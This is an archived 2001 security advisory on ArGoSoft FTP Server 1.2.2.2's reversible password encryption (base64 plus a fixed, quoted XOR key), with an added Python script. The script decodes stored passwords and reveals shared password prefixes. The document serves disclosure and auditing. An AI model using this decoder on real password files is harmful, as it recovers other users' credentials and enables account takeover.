ArGoSoft FTP Server 1.2.2.2 Weak password encryption

From: ByteRage (byterageat_private)
Date: Thu Jul 12 2001 - 11:36:53 PDT

    ArGoSoft FTP Server 1.2.2.2 Weak password encryption
    
    AFFECTED SYSTEMS
    
    ArGoSoft FTP Server 1.2.2.2
    
    DESCRIPTION
    
    ArGoSoft FTP Server 1.2.2.2 for Win32 is vulnerable to
    decryption of its password file. The programmers are
    evidently aware of this, since the FTP Server program
    itself implements the decryption: the decrypted
    passwords can be found in the program's memory dumps,
    and a system debugger or a password-revealing tool
    shows the plaintext password behind the **** in User
    Properties (one would normally expect that field to
    hold a placeholder such as "-=encrypted=-" so that the
    password can only be changed, not read, but here it
    contains the plaintext password).
    
    This simple observation alone shows that the password
    file uses a weak, reversible encryption algorithm, and
    that the passwords can be recovered from the
    ciphertext.
    
    So I started studying this program, and I found the
    following decryption algorithm:
    
    We have the password in ciphertext: NkouCREIJVU=
    1) Look up each ciphertext character in the table
       'A'-'Z', 'a'-'z', '0'-'9', '+', '/' and take its
       index, ranging from 0 to 63 (each index represents
       6 bits). Every 4 such characters make up 3 binary
       bytes (4*6 bits = 3*8 bits).
    2) XOR the resulting binary limb with:

    "T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk="
    (the first byte of the decoded data is XORed with "T",
    the second with "3", and so on).
    
    After these two passes we get: NkouCREIJVU= ->
    byterage
    
    I've attached source code that decrypts ciphertext
    passwords: you can give a ciphertext as the first
    parameter to the executable, or you can give it the
    filename of an ArGoSoft FTP password file, and it will
    give you the passwords of all users.
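    The transform described above, as an added example written for
    this archive page (it is neither ByteRage's attached source nor
    ArGoSoft's code): step 1 is the standard base64 alphabet, so
    Python's base64 module does the table lookup, and step 2 XORs the
    decoded bytes with the quoted key string taken as raw ASCII. The
    encode direction and the prefix check are included to make the
    weakness visible to an auditor: the key is fixed and there is no
    per-user salt, so identical passwords store identically and a
    shared plaintext prefix shows as a shared ciphertext prefix. The
    advisory does not say how the program treats passwords longer
    than the 72-character key, so the example refuses them (an
    assumption, not documented behaviour).

```python
import base64

# Fixed XOR key quoted in the advisory.  It is applied as raw ASCII bytes
# ('T', '3', 'Z', ...), not base64-decoded first.
KEY = b"T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk="


def _xor_with_key(data: bytes) -> bytes:
    """XOR data byte-for-byte against KEY, starting at the first key byte."""
    if len(data) > len(KEY):
        # Assumption: the advisory does not describe behaviour past the key
        # length, so refuse rather than guess at wrap-around.
        raise ValueError("input longer than the fixed key (%d bytes)" % len(KEY))
    return bytes(d ^ k for d, k in zip(data, KEY))


def decode_password(stored: str) -> str:
    """Stored form -> plaintext: base64 table lookup (step 1), then XOR (step 2)."""
    limb = base64.b64decode(stored, validate=True)
    return _xor_with_key(limb).decode("latin-1")


def encode_password(plaintext: str) -> str:
    """Plaintext -> stored form.  XOR is its own inverse, so the same fixed key
    is used both ways with no salt or IV: this is obfuscation, not hashing."""
    raw = plaintext.encode("latin-1")
    return base64.b64encode(_xor_with_key(raw)).decode("ascii")


def common_prefix_length(stored_a: str, stored_b: str) -> int:
    """Number of leading bytes two stored values share after base64 decoding.

    Both were XORed with the same fixed key stream, so this equals the number
    of leading plaintext characters the two passwords share.  An auditor can
    spot reused or related passwords in the file without reversing any value.
    """
    a = base64.b64decode(stored_a, validate=True)
    b = base64.b64decode(stored_b, validate=True)
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


if __name__ == "__main__":
    # Sample ciphertext from the advisory.
    sample = "NkouCREIJVU="
    print(sample, "->", decode_password(sample))
    # Constructed pair of passwords showing the shared-prefix leak.
    print(common_prefix_length(encode_password("byterage"),
                               encode_password("bytecode")))
```

    Running the block prints the advisory's own sample decoding and a
    prefix length of 4 for the constructed pair "byterage"/"bytecode".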
    
    IMPACT
    
    When combined with the *.lnk upload bug I pointed out
    earlier, any user with write access can not only
    traverse directories but also obtain the passwords of
    all users.
    
    VENDOR STATUS
    
    I have sent my findings to supportat_private, but
    since they use the decryption algorithms within the
    FTP Server program themselves, they are aware of the
    fact that the password encryption is reversible.
    Hopefully they will review the encryption algorithm in
    a future release.
    
    ====================================================
    [ByteRage] byterageat_private [www.byterage.cjb.net]
    ====================================================
    
    This archive was generated by hypermail 2b30 : Sun Jul 15 2001 - 21:02:38 PDT